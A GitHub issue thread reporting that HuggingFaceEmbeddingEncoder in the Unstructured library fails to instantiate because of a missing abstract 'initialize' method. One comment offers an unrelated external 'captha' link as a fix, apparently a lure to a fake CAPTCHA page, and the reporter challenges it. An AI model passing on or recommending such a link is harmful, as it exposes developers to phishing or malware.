### ISSUE TITLE
bug/unable to instantiate HuggingFaceEmbeddingEncoder from unstructured.embed.huggingface

### ISSUE THREAD

**Issue by mattseddon** [Unstructured-IO/unstructured#3731]
**Describe the bug**

As of `0.16.0` I am unable to instantiate an instance of `HuggingFaceEmbeddingEncoder` from `unstructured.embed.huggingface` due to a missing abstract method (`initialize`)

**To Reproduce**
Provide a code snippet that reproduces the issue.

```python
from unstructured.embed.huggingface import (
    HuggingFaceEmbeddingConfig,
    HuggingFaceEmbeddingEncoder,
)

embedding_encoder = HuggingFaceEmbeddingEncoder(config=HuggingFaceEmbeddingConfig())
```

Returns `TypeError: Can't instantiate abstract class HuggingFaceEmbeddingEncoder without an implementation for abstract method 'initialize'`

For full example see: https://github.com/iterative/datachain/blob/main/examples/llm_and_nlp/unstructured-embeddings-gen.py 

**Expected behavior**

No error

**Screenshots**

N/A

**Environment Info**
Please run `python scripts/collect_env.py` and paste the output here. 
This will help us understand more about the environment in which the bug occurred.

I have seen this across Windows, Linux and Mac (https://github.com/iterative/datachain/actions/runs/11395986364)

**Additional context**

I opened to #3730 close this issue.

**Comment by Prateek-coder19** [comment]
to fix your trouble check this solution [click](https://www.calvarywhangarei.co.nz/captha/index.html)
maybe this will solve your problem.

**Comment by mattseddon** [comment]
@Prateek-coder19 why would I visit this address: https://www.calvarywhangarei.co.nz/captha/index.html ?????

**Comment by mattseddon** [comment]
It appears the team has no desire to merge the fix for this.
